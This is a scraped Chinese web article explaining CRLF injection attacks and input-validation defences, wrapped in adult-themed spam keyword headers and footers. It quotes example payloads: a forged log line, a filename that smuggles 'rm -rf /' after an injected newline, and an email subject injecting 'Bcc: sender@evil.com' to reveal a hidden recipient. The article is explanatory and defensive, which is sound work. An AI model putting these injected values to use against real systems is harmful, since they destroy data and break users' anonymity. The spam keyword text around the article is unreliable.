成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

簡析CRLF注入攻擊

安全 黑客攻防
本文通過介紹CRLF注入攻擊的攻擊形式與過程,簡述何謂CRLF注入攻擊以及它造成的危害,使得廣大的網絡管理員能夠對這種偏僻的攻擊形式引起重視。

仿佛CRLF注入攻擊并不像什么XSS、MYSQL注入攻擊那么著名,但是不可否認的是如果安全漏洞存在的話這種攻擊同樣有效,并且也會對用戶造成極大的破壞。本篇文章將為您講述一下有關于CRLF注入攻擊是如何實施的。

CRLF的含義是“carriage return/line feed”,意思就是回車。這是兩個ASCII字符,分別排在第十三和第十位。CR和LF是在計算機終端還是電傳打印機的時候遺留下來的東西。電傳打字機就像普通打字機一樣工作。在每一行的末端,CR命令讓打印頭回到左邊。LF命令讓紙前進一行。雖然使用卷紙的終端時代已經過去了,但是,CR和LF命令依然存在,許多應用程序和網絡協議仍使用這些命令作為分隔符。

攻擊者在搜索安全漏洞的時候沒有忽略很少使用的CRLF.攻擊者可以通過在一段數據中加入CRLF命令來改變接受這個數據的應用程序處理這個數據的方式,從而執行CFRL注入攻擊。

CRLF攻擊最基本的例子包括向記錄文件中增加偽造的記錄。也就是說,有安全漏洞的應用程序把一個用戶輸入的內容寫到系統記錄文件中。攻擊者可以提供如下輸入內容:

Testing123MYSQL DATABASE ERROR: TABLE CORRUPTION

當系統管理員在早上查看他的紀錄時,他可能會用很多時間排除一個根本就不存在的故障。狡猾的攻擊者在攻擊系統的另一部分時,可以使用這種特洛伊木馬分散管理員的注意力。

想像一下,一個應用程序收到用戶輸入的一個文件名,然后對那個文件執行一個指令,如“ls -a .”。如果這個應用程序存在CRLF安全漏洞,攻擊者就可以輸入這樣的內容:

File.txtrm -rf /

這個有安全漏洞的應用程序就會執行這個命令“ls -a File.txt”,然后再執行這個命令“rm -rf /”。如果這個應用程序是一個根程序,這可能就是它執行的最后一個命令,因為在根分區的全部文件都被刪除了。

考慮使用一種CRFL注入攻擊暴露使用一種基于網絡的匿名電子郵件系統的某個人的電子郵件地址。那個電子郵件系統的工作方式可能是這樣的:電子郵件的發送者用他們的電子郵件地址、信息主題和信息本身填寫一個表格。當這個表格遞交到網絡服務器上的時候,網絡服務器把這個表格轉換為一個SMTP電子郵件,并且發送給收件人。發送者永遠不會看到收件人的電子郵件地址。這個地址只有服務器知道。

如果這個應用程序存在CRLF攻擊安全漏洞,電子郵件的發件人可以通過創建下面這樣的一行主題來破壞收件人的匿名性:

Subject: Peekaboo, I see youBcc: sender@evil.com

當有安全漏洞的應用程序得到這個數據的時候,它向這個郵件的文件頭增加一個不需要的行,創建一個發送到發件人郵件地址的這封郵件的盲送副本。在這個副本中,“To:”地址是看不到的,因此把收件人的郵件地址暴露給發送者。

使用良好的編程技術能夠避免包括CRLF攻擊在內的注入攻擊。要使你的應用程序不受CRFL注入攻擊,需要你保持與防御SQL注入攻擊等其它類型的注入攻擊一樣的警惕性:永遠不要相信輸入的內容!在你控制范圍以外的任何來源的輸入內容都必須要進行檢查,在你的應用程序對數據執行操作之前,任何不符合預期的數據類型的字符都要刪除。例如,如果你期待著一個電子郵件主題行,這個數據中的所有的字符都應該是字母、數字和標點符號。如果你的應用程序期待著一個文件名,這個數據中只能包含合法地在文件名中使用的字符。如果程序員在這兩個例子的情況下簡單地過濾掉CR和LF字符,這個攻擊就失敗了。

用戶輸入是“壞字符”的一個來源。但是,你不要忘記檢查你從來沒有編寫過的其它程序輸入的內容。在許多情況下,攻擊者可以把一個注入攻擊從一個有漏洞的應用程序轉移到一個基本的例行程序中。程序員不會檢查基本的例行程序中的數據,因為那里的數據不是直接來自于用戶。你要把任何你不能跟蹤到可信賴的來源的數據都當作被感染的數據。這樣,你就安全了。
 

【編輯推薦】

  1. 淺析黑客如何入侵企業網絡
  2. Lynx命令行URL CRLF注入漏洞
  3. 深度分析TCP會話劫持
  4. 黑客技術:CRLF注入攻擊原理和防范措施
  5. 使用工具和測試防范跨站點腳本攻擊
責任編輯:張啟峰 來源: ZDNET
相關推薦

2015-05-13 10:36:43

2022-03-02 11:42:06

勒索軟件網絡安全

2022-08-30 13:20:38

DNS攻擊網絡安全

2023-10-19 11:53:53

2011-07-12 14:04:58

2023-08-02 12:14:56

2009-06-08 21:25:29

Java聲音技術

2010-09-08 16:25:39

SIP協議棧

2010-09-10 09:52:44

開源協議棧

2022-12-06 12:29:16

2009-08-13 15:48:57

C#指針

2022-06-04 16:11:14

勒索軟件加密Nokoyawa

2011-07-22 11:05:15

光纖通信

2010-05-07 12:39:05

SQL Server負載均衡

2011-07-20 10:20:04

2023-03-17 16:26:25

開源鴻蒙藍牙能力

2010-06-21 14:05:08

Linux APM

2010-04-12 15:39:37

無線接入技術應用

2013-12-05 10:13:25

iOS圖標

2010-04-19 12:28:57

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产欧美精品一区二区 | 亚洲国产精品一区在线观看 | 99精品视频在线 | 欧美一区二区三区在线 | 中文字幕精品视频 | 欧美 日本 国产 | 欧美jizzhd精品欧美巨大免费 | 精品网站999www | 日韩欧美网 | 在线免费观看成人 | 国产高清一区二区三区 | 中文字幕亚洲精品 | 久久久久亚洲视频 | 美日韩精品 | 午夜电影合集 | 国产精品视频网 | 伊人久久精品一区二区三区 | 欧美性网 | 神马影院一区二区三区 | 国产成人综合亚洲欧美94在线 | 日韩精品一区二区三区久久 | 91久久精品国产91久久 | 人人爽日日躁夜夜躁尤物 | 免费久久久久久 | 中文字幕亚洲区 | 国产在线一区二 | 国产99久久精品一区二区永久免费 | 拍真实国产伦偷精品 | 成人黄色在线 | 日韩中文字幕久久 | 欧美国产精品一区二区三区 | 国产成人综合一区二区三区 | 国产精品一区二区在线 | 国产在线永久免费 | 久久综合一区 | 免费三级网站 | 精品欧美一区二区三区久久久 | 国产一区二区精品在线 | 亚洲高清在线播放 | 欧美成人一区二区三区 | 国产 日韩 欧美 制服 另类 |